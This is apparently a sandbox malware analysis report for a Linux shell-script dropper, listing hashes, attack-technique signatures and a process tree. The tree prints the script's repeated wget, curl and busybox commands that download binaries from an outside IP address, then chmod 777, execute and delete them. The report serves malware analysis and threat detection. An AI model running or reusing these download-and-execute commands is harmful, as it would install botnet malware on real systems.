Analysis
-
max time kernel
18s -
max time network
132s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
-
Size
10KB
-
MD5
10f1892ae230c88400e80e691b208153
-
SHA1
f83482329b6b46cc1ef37aee0eba3b36ef1d7756
-
SHA256
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01
-
SHA512
7d646519673f50ee4afd8cbd7b42a63c35cd5b58a5d217aa6d9bcb54078a446f27439806aef4602df29f2576bea05e7b0b88a87a7969c96ce8fb3e11ce13172f
-
SSDEEP
192:Omh5SdBY8PQJw8tERk4pw8tE3Yh5SdBiG:Omh5SdBdPQaRk463Yh5SdBX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1603 chmod 1675 chmod 1663 chmod 1645 chmod 1543 chmod 1561 chmod 1621 chmod 1669 chmod 1591 chmod 1627 chmod 1651 chmod 1615 chmod 1657 chmod 1531 chmod 1585 chmod 1597 chmod 1525 chmod 1567 chmod 1639 chmod 1579 chmod 1609 chmod 1633 chmod 1681 chmod 1687 chmod 1537 chmod 1549 chmod 1555 chmod 1573 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z 1526 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO 1532 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S 1538 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME 1544 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV 1550 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH 1556 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal 1562 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 1568 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS 1574 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm 1580 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ 1586 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv 1592 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 1598 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj 1604 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm 1610 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ 1616 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv 1622 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 1628 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj 1634 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z 1640 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO 1646 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S 1652 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME 1658 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV 1664 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH 1670 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal 1676 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 1682 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS 1688 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1680 busybox 1564 wget 1565 curl 1566 busybox 1569 rm 1678 wget 1568 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 1679 curl 1682 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 1683 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z curl File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj curl File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME curl File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ curl File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V curl File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm curl File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv curl File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V curl File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS curl File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH curl File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal curl File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS curl File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj curl File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S curl File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV curl File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal curl File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME curl File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 curl File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ curl File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv curl File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 curl File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO curl File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO curl File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z curl File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH curl File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S curl File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV curl File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm curl
Processes
-
/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh1⤵PID:1516
-
/bin/rm/bin/rm bins.sh2⤵PID:1517
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:1518
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:1524
-
-
/bin/chmodchmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:1530
-
-
/bin/chmodchmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:1536
-
-
/bin/chmodchmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:1542
-
-
/bin/chmodchmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:1548
-
-
/bin/chmodchmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:1554
-
-
/bin/chmodchmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:1560
-
-
/bin/chmodchmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:1566
-
-
/bin/chmodchmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1568
-
-
/bin/rmrm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:1569
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:1572
-
-
/bin/chmodchmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:1578
-
-
/bin/chmodchmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:1584
-
-
/bin/chmodchmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:1590
-
-
/bin/chmodchmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:1596
-
-
/bin/chmodchmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:1602
-
-
/bin/chmodchmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Executes dropped EXE
PID:1604
-
-
/bin/rmrm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:1605
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:1608
-
-
/bin/chmodchmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:1614
-
-
/bin/chmodchmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:1620
-
-
/bin/chmodchmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:1626
-
-
/bin/chmodchmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- File and Directory Permissions Modification
PID:1627
-
-
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Executes dropped EXE
PID:1628
-
-
/bin/rmrm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:1629
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:1630
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Writes file to tmp directory
PID:1631
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:1632
-
-
/bin/chmodchmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- File and Directory Permissions Modification
PID:1633
-
-
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Executes dropped EXE
PID:1634
-
-
/bin/rmrm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:1635
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:1636
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:1638
-
-
/bin/chmodchmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- File and Directory Permissions Modification
PID:1639
-
-
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Executes dropped EXE
PID:1640
-
-
/bin/rmrm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:1641
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:1642
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Writes file to tmp directory
PID:1643
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:1644
-
-
/bin/chmodchmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Executes dropped EXE
PID:1646
-
-
/bin/rmrm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:1647
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:1648
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Writes file to tmp directory
PID:1649
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:1650
-
-
/bin/chmodchmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- File and Directory Permissions Modification
PID:1651
-
-
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Executes dropped EXE
PID:1652
-
-
